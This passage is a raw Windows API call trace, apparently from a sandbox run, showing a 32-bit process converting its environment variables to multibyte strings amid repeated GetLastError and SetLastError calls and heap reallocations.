0x0 [0199.749] SetLastError (dwErrCode=0x0) [0199.749] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0x1c [0199.750] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x20) returned 0x771fb8 [0199.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0199.750] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x14) returned 0x770d58 [0199.750] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x770d58, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.750] SetLastError (dwErrCode=0x0) [0199.750] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0x20 [0199.751] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x24) returned 0x771fb8 [0199.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0199.751] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xd) returned 0x76e9a0 [0199.751] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x76e9a0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.751] SetLastError (dwErrCode=0x0) [0199.751] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] GetLastError () returned 0x0 [0199.752] SetLastError (dwErrCode=0x0) [0199.752] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0x24 [0199.752] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x28) returned 0x771fb8 [0199.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0199.753] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x25) returned 0x76ad98 [0199.753] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x76ad98, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.753] GetLastError () returned 0x0 [0199.753] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] GetLastError () returned 0x0 [0199.754] SetLastError (dwErrCode=0x0) [0199.754] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x771fb8) returned 0x28 [0199.754] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x771fb8, Size=0x2c) returned 0x770d78 [0199.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0199.754] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x39) returned 0x765af0 [0199.754] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x765af0, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0199.754] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.755] GetLastError () returned 0x0 [0199.755] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770d78) returned 0x2c [0199.756] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770d78, Size=0x30) returned 0x770d78 [0199.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0199.756] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x18) returned 0x771fb8 [0199.756] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x771fb8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.756] GetLastError () returned 0x0 [0199.756] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.757] SetLastError (dwErrCode=0x0) [0199.757] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770d78) returned 0x30 [0199.758] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770d78, Size=0x34) returned 0x770d78 [0199.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0199.758] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x17) returned 0x770db8 [0199.758] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x770db8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.758] GetLastError () returned 0x0 [0199.758] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.759] SetLastError (dwErrCode=0x0) [0199.759] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] GetLastError () returned 0x0 [0199.760] SetLastError (dwErrCode=0x0) [0199.760] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770d78) returned 0x34 [0199.760] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770d78, Size=0x38) returned 0x770d78 [0199.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0199.760] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xe) returned 0x76e9b8 [0199.760] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x76e9b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0199.761] GetLastError () returned 0x0 [0199.761] SetLastError (dwErrCode=0x0) [0199.761] GetLastError () returned 0x0 [0199.761] SetLastError (dwErrCode=0x0) [0199.761] GetLastError () returned 0x0 [0199.761] SetLastError (dwErrCode=0x0) [0199.761] GetLastError () returned 0x0 [0199.761] SetLastError (dwErrCode=0x0) [0199.761] GetLastError () returned 0x0 [0199.761] SetLastError (dwErrCode=0x0) [0199.761] GetLastError () returned 0x0 [0199.761] SetLastError (dwErrCode=0x0) [0199.761] GetLastError () returned 0x0 [0199.761] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.762] GetLastError () returned 0x0 [0199.762] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770d78) returned 0x38 [0199.763] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770d78, Size=0x3c) returned 0x770dd8 [0199.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 105 [0199.763] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x69) returned 0x770e20 [0199.763] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x770e20, cbMultiByte=105, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpUsedDefaultChar=0x0) returned 105 [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.763] SetLastError (dwErrCode=0x0) [0199.763] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.764] GetLastError () returned 0x0 [0199.764] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] SetLastError (dwErrCode=0x0) [0199.765] GetLastError () returned 0x0 [0199.765] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770dd8) returned 0x3c [0199.765] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770dd8, Size=0x40) returned 0x770dd8 [0199.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0199.765] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x3e) returned 0x765b38 [0199.765] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", cchWideChar=-1, lpMultiByteStr=0x765b38, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC", lpUsedDefaultChar=0x0) returned 62 [0199.765] GetLastError () returned 0x0 [0199.766] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770dd8) returned 0x40 [0199.766] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770dd8, Size=0x44) returned 0x770e98 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0199.766] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1b) returned 0x76f3f0 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITECTURE=x86", cchWideChar=-1, lpMultiByteStr=0x76f3f0, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITECTURE=x86", lpUsedDefaultChar=0x0) returned 27 [0199.766] GetLastError () returned 0x0 [0199.766] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x44 [0199.766] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x48) returned 0x770e98 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0199.766] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x1d) returned 0x76f418 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_ARCHITEW6432=AMD64", cchWideChar=-1, lpMultiByteStr=0x76f418, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_ARCHITEW6432=AMD64", lpUsedDefaultChar=0x0) returned 29 [0199.766] GetLastError () returned 0x0 [0199.766] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x48 [0199.766] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x4c) returned 0x770e98 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0199.766] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x48) returned 0x766ed0 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", cchWideChar=-1, lpMultiByteStr=0x766ed0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 4, GenuineIntel", lpUsedDefaultChar=0x0) returned 72 [0199.766] GetLastError () returned 0x0 [0199.766] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x4c [0199.766] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x50) returned 0x770e98 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0199.766] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x12) returned 0x770d78 [0199.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_LEVEL=6", cchWideChar=-1, lpMultiByteStr=0x770d78, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_LEVEL=6", lpUsedDefaultChar=0x0) returned 18 [0199.766] GetLastError () returned 0x0 [0199.766] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x770e98) returned 0x50 [0199.766] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x770e98, Size=0x54) returned 0x770e98 